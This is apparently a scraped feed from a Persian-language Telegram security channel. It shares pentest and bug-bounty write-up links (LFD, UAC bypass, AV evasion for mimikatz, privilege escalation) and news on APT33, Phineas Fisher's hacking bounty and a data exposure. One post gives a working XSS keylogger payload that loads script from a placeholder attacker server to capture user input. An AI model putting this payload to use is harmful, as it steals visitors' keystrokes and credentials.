رایت آپ کشف باگ LFD و دریافت ۱۷ هزار دلار جایزه
https://samcurry.net/reading-asp-secrets-for-17000/
#writeup
#lfd
#web
#pentest
@sec_nerd
https://samcurry.net/reading-asp-secrets-for-17000/
#writeup
#lfd
#web
#pentest
@sec_nerd
samcurry.net
Reading ASP secrets for $17,000
One of the more common vulnerabilities on ASP.NET applications is local file disclosure. If you've never developed or worked with this technology, exploiting LFD can be confusing and often unfruitful. In the following write up I describe approaching an application…
امنیت اطلاعات pinned «گروه امنیت اطلاعات https://t.iss.one/joinchat/Cu-7qUvIA5ULBMsmH9yVzA @sec_nerd»
Forwarded from امنیت اطلاعات
This media is not supported in your browser
VIEW IN TELEGRAM
Remote XSS Keylogger:
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://pastebin.com/hzzQqSFt
keylogger.js: https://pastebin.com/ySyG4TiN
#BugBounty
#web
#pentest
#XSS
@sec_nerd
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://pastebin.com/hzzQqSFt
keylogger.js: https://pastebin.com/ySyG4TiN
#BugBounty
#web
#pentest
#XSS
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
فیسبوک دوربین گوشی های آیفون را بصورت مخفیانه روشن میکند!
این اتفاق از سوی برخی کاربران در توییتر گزارش و ویدیوهای اثبات آن منتشر شده است.
هنوز مشخص نیست باز شدن دوربین جلوی گوشی های آیفون یک مشکل نرم افزاری ست یا فیسبوک در حال جاسوسی از کاربران خود میباشد.
https://thehackernews.com/2019/11/facebook-ios-camera.html
#facebook
#privacy
#news
@sec_nerd
این اتفاق از سوی برخی کاربران در توییتر گزارش و ویدیوهای اثبات آن منتشر شده است.
هنوز مشخص نیست باز شدن دوربین جلوی گوشی های آیفون یک مشکل نرم افزاری ست یا فیسبوک در حال جاسوسی از کاربران خود میباشد.
https://thehackernews.com/2019/11/facebook-ios-camera.html
#privacy
#news
@sec_nerd
اگر سایت هدف اپلیکیشن اندروید دارد:
بعد از دانلود اپ
از Diggy برای استخراج آدرس های وب آن استفاده کنید
از Arjun برای پیدا کردن پارامترهای ارسالی به آدرس های مذکور استفاده کنید.
#android
#pentest
#web
#bugbounty
@sec_nerd
بعد از دانلود اپ
از Diggy برای استخراج آدرس های وب آن استفاده کنید
از Arjun برای پیدا کردن پارامترهای ارسالی به آدرس های مذکور استفاده کنید.
#android
#pentest
#web
#bugbounty
@sec_nerd
GitHub
GitHub - s0md3v/Diggy: Extract endpoints from apk files.
Extract endpoints from apk files. Contribute to s0md3v/Diggy development by creating an account on GitHub.
رایت آپی در خصوص یکی از راه های دور زدن UAC در ویندوز
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-9051c6a85734
#uac
#windows
#privesc
#writeup
@sec_nerd
https://medium.com/@z3roTrust/bypassing-windows-user-account-control-9051c6a85734
#uac
#windows
#privesc
#writeup
@sec_nerd
Medium
Bypassing Windows User Account Control
Look at you go with your badass hacker self, just hackity-hack-hackin’ away. As the quote from Sun Tzu’s Art of War suggests, however, if you can defeat your opponent without a fight or little-to-no…
This media is not supported in your browser
VIEW IN TELEGRAM
rsdl Subdomain Scanner
Subdomain Scan With Ping Method.
https://github.com/tismayil/rsdl
#subdomain
#web
#pentest
#bugbounty
@sec_nerd
Subdomain Scan With Ping Method.
https://github.com/tismayil/rsdl
#subdomain
#web
#pentest
#bugbounty
@sec_nerd
آموزش دور زدن آنتی ویروس با هدف اجرای mimikatz
https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
#windows
#privesc
#mimikatz
@sec_nerd
https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
#windows
#privesc
#mimikatz
@sec_nerd
شرکت trend micro طی گزارشی ادعا کرد شبکه وی پی ان هکرهای ایرانی که با کد APT33 شناخته میشوند را شناسایی کرده است.
طبق این گزارش هکرهای ایرانی شبکه VPN مخصوص به خود راه اندازی کرده و با استفاده از آن اقدام به اتصال به زیرساختهای نفوذ خود میکردند و حتی بعضی از مرورهای وب خود را نیز از این طریق انجام میدادند.
گروه مذکور با بدافزار معروف Shamoon نیز شناخته میشود که در سال ۲۰۱۲ توانست ۳۵ هزار کامپیوتر را در آرامکوی عربستان آلوده کند.
در طی سال ۲۰۱۹ حملات این گروه بیشتر به سمت Spear Phishing سوق پیدا کرد و ترند مایکرو تایید میکند که این گروه امسال یک کمپانی خصوصی امریکایی که خدمات مرتبط با امنیت ملی ارائه میدهد را هدف قرار داده است.
بر اساس یک طرح دست نویس از سوی محققان ترند مایکرو، چهار لایه از شبکه ی APT33 شناسایی شده:
لایه ی VPN: که شامل نود های VPN با هدف مخفی کردن آی پی واقعی و مکان بکار گرفته شده است.
لایه ی کنترل بات: لایه ی میانجی سرورها
لایه ی C&C: جایی که گروه بات نت های بدافزاری خود را کنترل میکند.
لایه ی پروکسی: مجموعه ای از سرورهای ابری پروکسی که سرورهای C&C خود را از زامبی ها پنهان میکنند
لایه ی اول هم از ابزارهای متن باز مانند OpenVPN بجای معادل های تجاری بهره میبرد.
⭕️ به نظر Trend Micro اشتباه بزرگ این گروه استفاده از شبکه ی وی پی ان اختصاصی بود زیرا اگر آنها از سرویس های عمومی استفاده میکردند، مانیتور کردن آنها در بین انبوهی از کاربران دیگر آسان نبود ولی آنها درخواستهای مشکوک خود را به چند آی پی محدود کردند که کشف و بررسی آنها را آسان کرد ⭕️
بررسی این شبکه ی وی پی ان همچنین باعث برملا شدن تلاش های این گروه برای شناسایی شبکه های مرتبط با زنجیره ی تامین و صنعت نفت شد.
در آخر ترند اشاره میکند که از این زیرساختها برای دسترسی به وبسایتهای مرتبط با هک، میل، ارز دیجیتال و اکسپلویت ها استفاده شده.
پیشنهاد ترند میکرو به شرکت های نفت و گاز این بوده است که لاگ سرورهای خود را برای یافتن آدرس های آی پی موجود در این گزارش (در لینک زیر قابل دسترسی است) بررسی کنند.
منبع:
https://www.zdnet.com/article/iranian-hacking-group-built-its-own-vpn-network/
🌺 اختصاصی امنیت اطلاعات 🌺
#iran
#apt33
#news
@sec_nerd
طبق این گزارش هکرهای ایرانی شبکه VPN مخصوص به خود راه اندازی کرده و با استفاده از آن اقدام به اتصال به زیرساختهای نفوذ خود میکردند و حتی بعضی از مرورهای وب خود را نیز از این طریق انجام میدادند.
گروه مذکور با بدافزار معروف Shamoon نیز شناخته میشود که در سال ۲۰۱۲ توانست ۳۵ هزار کامپیوتر را در آرامکوی عربستان آلوده کند.
در طی سال ۲۰۱۹ حملات این گروه بیشتر به سمت Spear Phishing سوق پیدا کرد و ترند مایکرو تایید میکند که این گروه امسال یک کمپانی خصوصی امریکایی که خدمات مرتبط با امنیت ملی ارائه میدهد را هدف قرار داده است.
بر اساس یک طرح دست نویس از سوی محققان ترند مایکرو، چهار لایه از شبکه ی APT33 شناسایی شده:
لایه ی VPN: که شامل نود های VPN با هدف مخفی کردن آی پی واقعی و مکان بکار گرفته شده است.
لایه ی کنترل بات: لایه ی میانجی سرورها
لایه ی C&C: جایی که گروه بات نت های بدافزاری خود را کنترل میکند.
لایه ی پروکسی: مجموعه ای از سرورهای ابری پروکسی که سرورهای C&C خود را از زامبی ها پنهان میکنند
لایه ی اول هم از ابزارهای متن باز مانند OpenVPN بجای معادل های تجاری بهره میبرد.
⭕️ به نظر Trend Micro اشتباه بزرگ این گروه استفاده از شبکه ی وی پی ان اختصاصی بود زیرا اگر آنها از سرویس های عمومی استفاده میکردند، مانیتور کردن آنها در بین انبوهی از کاربران دیگر آسان نبود ولی آنها درخواستهای مشکوک خود را به چند آی پی محدود کردند که کشف و بررسی آنها را آسان کرد ⭕️
بررسی این شبکه ی وی پی ان همچنین باعث برملا شدن تلاش های این گروه برای شناسایی شبکه های مرتبط با زنجیره ی تامین و صنعت نفت شد.
در آخر ترند اشاره میکند که از این زیرساختها برای دسترسی به وبسایتهای مرتبط با هک، میل، ارز دیجیتال و اکسپلویت ها استفاده شده.
پیشنهاد ترند میکرو به شرکت های نفت و گاز این بوده است که لاگ سرورهای خود را برای یافتن آدرس های آی پی موجود در این گزارش (در لینک زیر قابل دسترسی است) بررسی کنند.
منبع:
https://www.zdnet.com/article/iranian-hacking-group-built-its-own-vpn-network/
🌺 اختصاصی امنیت اطلاعات 🌺
#iran
#apt33
#news
@sec_nerd
ZDNET
Iranian hacking group built its own VPN network
Security researchers identify APT33's private network of 21 VPN nodes.
This media is not supported in your browser
VIEW IN TELEGRAM
کشف آسیب پذیری های XSS از نوع Reflected
https://www.youtube.com/watch?v=GHwXn8RWUiE
#xss
#web
#bugbounty
@sec_nerd
https://www.youtube.com/watch?v=GHwXn8RWUiE
#xss
#web
#bugbounty
@sec_nerd
امنیت اطلاعات
کشف آسیب پذیری های XSS از نوع Reflected https://www.youtube.com/watch?v=GHwXn8RWUiE #xss #web #bugbounty @sec_nerd
افزونه ی مورد استفاده در این ویدیو
BurpSuite Extension - Asset Discover
https://github.com/redhuntlabs/BurpSuite-Asset_Discover
#burpsuite
#web
#pentest
@sec_nerd
BurpSuite Extension - Asset Discover
https://github.com/redhuntlabs/BurpSuite-Asset_Discover
#burpsuite
#web
#pentest
@sec_nerd
تست نفوذ شبکه برای تازه کاران
https://github.com/hmaverickadams/Beginner-Network-Pentesting/blob/master/Readme.md
#network
#pentest
@sec_nerd
https://github.com/hmaverickadams/Beginner-Network-Pentesting/blob/master/Readme.md
#network
#pentest
@sec_nerd
GitHub
Beginner-Network-Pentesting/Readme.md at master · hmaverickadams/Beginner-Network-Pentesting
Notes for Beginner Network Pentesting Course. Contribute to hmaverickadams/Beginner-Network-Pentesting development by creating an account on GitHub.
هکری که پیش از این اقدام به هک کردن hacking team کرده بود اعلام کرد به کسانی که اقدام به نفوذ به شرکت های نفتی و بانک ها کنند و اسناد محرمانه آنها را بدست آورند ۱۰۰ هزار دلار جایزه میدهد. این پرداخت از طریق ارزهای دیجیتال انجام خواهد گرفت.
این هکر که با نام Phineas Fisher شناخته میشود مثالهایی از اهداف مدنظر خود زد که برخی شرکت های ارز دیجیتال در امریکای جنوبی، شرکت اسراییلی NSO و شرکت نفتی هالیبرتون جزو نمونه های آن هستند.
منبع:
https://www.vice.com/en_us/article/vb5agy/phineas-fisher-offers-dollar100000-bounty-for-hacks-against-banks-and-oil-companies
#news
#phineas_fisher
@sec_nerd
این هکر که با نام Phineas Fisher شناخته میشود مثالهایی از اهداف مدنظر خود زد که برخی شرکت های ارز دیجیتال در امریکای جنوبی، شرکت اسراییلی NSO و شرکت نفتی هالیبرتون جزو نمونه های آن هستند.
منبع:
https://www.vice.com/en_us/article/vb5agy/phineas-fisher-offers-dollar100000-bounty-for-hacks-against-banks-and-oil-companies
#news
#phineas_fisher
@sec_nerd
Vice
Phineas Fisher Offers $100,000 Bounty to Hack Banks and Oil Companies
It’s a reward for hacktivists and criminals who break into capitalist institutions, offered by one of the most infamous hackers of all time.
راهکارهایی برای بالابردن سطح دسترسی در سیستم عامل ویندوز
https://blog.xpnsec.com/becoming-system/
#windows
#privesc
@sec_nerd
https://blog.xpnsec.com/becoming-system/
#windows
#privesc
@sec_nerd
XPN InfoSec Blog
@_xpn_ - Alternative methods of becoming SYSTEM
For many pentesters, Meterpreter's getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever have wondered just how this works behind the scenes? In this post I will show the details of how this technique works…
کشف دیتابیسی با ۱/۲ میلیارد رکورد از افراد بصورت محافظت نشده.
این دیتابیس که حاوی اطلاعاتی از کاربران لینکدین و فیسبوک است، یکی از بزرگترین دیتابیس های کشف شده در فضای اینترنت است.
دیتابیس مذکور که از نوع elasticsearch است حاوی اطلاعاتی نظیر نام، آدرس ایمیل، شماره تلفن و آدرس صفحات افراد در لینکدین و فیسبوک است.
به نظر میرسد که این دیتابیس متعلق به شرکت https://www.peopledatalabs.com/ باشد
محتویات کشف شده :
بیش از ۱/۵ میلیارد نفر که نزدیک به ۲۶۰ میلیون آن امریکایی هستند.
بیش از یک میلیارد آدرس ایمیل که هفتاد درصد ایمیل های کاری آن متعلق به اشخاص تصمیم ساز در امریکا، کانادا و بریتانیا تشکیل شده.
بیش از ۴۲۰ میلیون آدرس پروفایل لینکدین
بیش از یک میلیارد آیدی و آدرس صفحه فیسبوک
بیش از ۴۰۰ میلیون شماره تلفن که بیش از ۲۰۰ میلیون آن متعلق به امریکایی هاست.
اطلاعات بیشتر:
https://www.dataviper.io/blog/2019/pdl-data-exposure-billion-people/
#breach
#news
@sec_nerd
این دیتابیس که حاوی اطلاعاتی از کاربران لینکدین و فیسبوک است، یکی از بزرگترین دیتابیس های کشف شده در فضای اینترنت است.
دیتابیس مذکور که از نوع elasticsearch است حاوی اطلاعاتی نظیر نام، آدرس ایمیل، شماره تلفن و آدرس صفحات افراد در لینکدین و فیسبوک است.
به نظر میرسد که این دیتابیس متعلق به شرکت https://www.peopledatalabs.com/ باشد
محتویات کشف شده :
بیش از ۱/۵ میلیارد نفر که نزدیک به ۲۶۰ میلیون آن امریکایی هستند.
بیش از یک میلیارد آدرس ایمیل که هفتاد درصد ایمیل های کاری آن متعلق به اشخاص تصمیم ساز در امریکا، کانادا و بریتانیا تشکیل شده.
بیش از ۴۲۰ میلیون آدرس پروفایل لینکدین
بیش از یک میلیارد آیدی و آدرس صفحه فیسبوک
بیش از ۴۰۰ میلیون شماره تلفن که بیش از ۲۰۰ میلیون آن متعلق به امریکایی هاست.
اطلاعات بیشتر:
https://www.dataviper.io/blog/2019/pdl-data-exposure-billion-people/
#breach
#news
@sec_nerd
People Data Labs
B2B Data Provider for Industry Leading Platforms | People Data Labs
People Data Labs builds people data. Use our dataset of 1.5 Billion unique person profiles to build products, enrich person profiles, power predictive modeling/ai, analysis, and more.